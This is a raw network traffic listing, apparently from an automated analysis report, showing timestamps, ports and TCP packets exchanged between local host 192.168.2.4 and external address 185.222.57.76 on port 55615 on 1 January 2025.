Jan 1, 2025 12:32:15.485034943 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.485044003 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.485050917 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.485059023 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.485065937 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.486886024 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.486978054 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.486985922 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.486993074 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.487000942 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.487009048 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.487118959 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.487128019 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.487726927 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.487875938 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488035917 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488044977 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488169909 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488178015 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488274097 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488281012 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488290071 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488296986 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488305092 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488372087 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488379955 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488388062 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488395929 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488408089 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488498926 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488507986 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488516092 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488557100 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488573074 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488583088 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488590956 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488599062 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488609076 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488636017 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488643885 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488655090 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488696098 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488730907 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488738060 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488745928 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488754034 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488760948 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488769054 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488775969 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488784075 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488790989 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488799095 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488806963 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488821030 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488828897 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488837957 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488845110 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488853931 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488864899 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488908052 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488915920 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488929987 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488938093 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488945007 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488951921 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488959074 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488966942 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488991022 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.488998890 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489006996 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489015102 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489017963 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489025116 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489038944 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489048004 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489056110 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489063978 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489072084 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489079952 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489132881 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489141941 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489274979 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489283085 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489286900 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489295006 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489301920 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489387989 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489396095 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489403009 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489411116 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489444017 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489451885 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489459991 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489476919 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489485979 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489492893 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489500999 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489507914 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489516020 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489522934 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489531994 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489538908 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489547014 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489553928 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489593983 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489600897 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489609003 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489615917 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489701033 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489710093 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489717960 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489725113 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489728928 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489736080 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489743948 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489795923 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489804983 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489811897 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489820004 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489826918 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489835978 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489844084 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489851952 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489859104 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489866972 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489923000 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489932060 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.489938974 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490035057 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490042925 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490050077 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490057945 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490066051 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490072966 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490096092 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490103960 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490112066 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490125895 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490134001 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490140915 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490149021 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490155935 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490183115 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490190983 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490199089 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490206003 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490220070 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490227938 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490236044 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490243912 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490252018 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490258932 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490267038 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490273952 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490281105 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490288019 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490339994 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490349054 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490355968 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490442991 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490449905 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490458012 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490464926 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490473032 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490479946 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490488052 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490515947 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490524054 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490533113 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490547895 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490556955 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490565062 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490571976 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490575075 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490577936 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490581036 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490583897 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490648985 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490658998 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490662098 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490669012 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490677118 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490684986 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490734100 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490741014 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490748882 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490756989 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490763903 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490772009 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490781069 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490787983 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490797997 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490804911 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490855932 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490864992 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490873098 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490880966 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490889072 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490895987 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490904093 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490911007 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490919113 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490926027 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490933895 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.490995884 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.491003990 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.491040945 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.491055965 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.491064072 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.491070986 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.491077900 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.491086006 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.491095066 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.491102934 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.491111040 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.491117954 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.491126060 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.491133928 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.491141081 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.491183996 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.491192102 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.491199970 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.491208076 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.491292000 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.491300106 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.491308928 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.491322041 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.491332054 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.491341114 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.491348028 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.491355896 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.491436005 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.491444111 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.491451979 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.491458893 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:15.530944109 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:16.496181011 CET	55615	49741	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:16.509254932 CET	49741	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:16.509269953 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:20.102173090 CET	49739	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:20.102196932 CET	49739	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:20.107021093 CET	55615	49739	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:20.107109070 CET	55615	49739	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:20.272017002 CET	55615	49739	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:20.318381071 CET	49739	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:20.377655029 CET	55615	49739	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:20.377665997 CET	55615	49739	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:20.377676964 CET	55615	49739	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:20.377727985 CET	49739	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:20.377851963 CET	55615	49739	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:20.377862930 CET	55615	49739	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:20.377939939 CET	49739	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.018683910 CET	49739	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.018997908 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.023775101 CET	55615	49739	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.023818970 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.023833036 CET	49739	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.023878098 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.024581909 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.029334068 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.381135941 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.386039019 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.386054039 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.386086941 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.386107922 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.386136055 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.386146069 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.386149883 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.386157036 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.386197090 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.386261940 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.386271954 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.386280060 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.386316061 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.386317968 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.386332035 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.386358976 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.390857935 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.390901089 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.390944004 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.390952110 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.391000032 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.391006947 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.391016960 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.391035080 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.391043901 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.391077995 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.435050964 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.435175896 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.454336882 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.454483032 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.459433079 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.459443092 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.459471941 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.459481001 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.459486008 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.459528923 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.459538937 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.459541082 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.459585905 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.459594011 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.459604025 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.459640980 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.459660053 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.459669113 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.459708929 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.459734917 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.459743023 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.459752083 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.459789991 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.459880114 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.459888935 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.459897041 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.459903002 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.459944010 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.459966898 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.459976912 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.459985971 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.460000038 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.460022926 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.460038900 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.460127115 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.460136890 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.460144043 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.460153103 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.460170031 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.460197926 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.460206032 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.460206985 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.460258007 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.464350939 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.464405060 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.464438915 CET	55615	49748	185.222.57.76	192.168.2.4
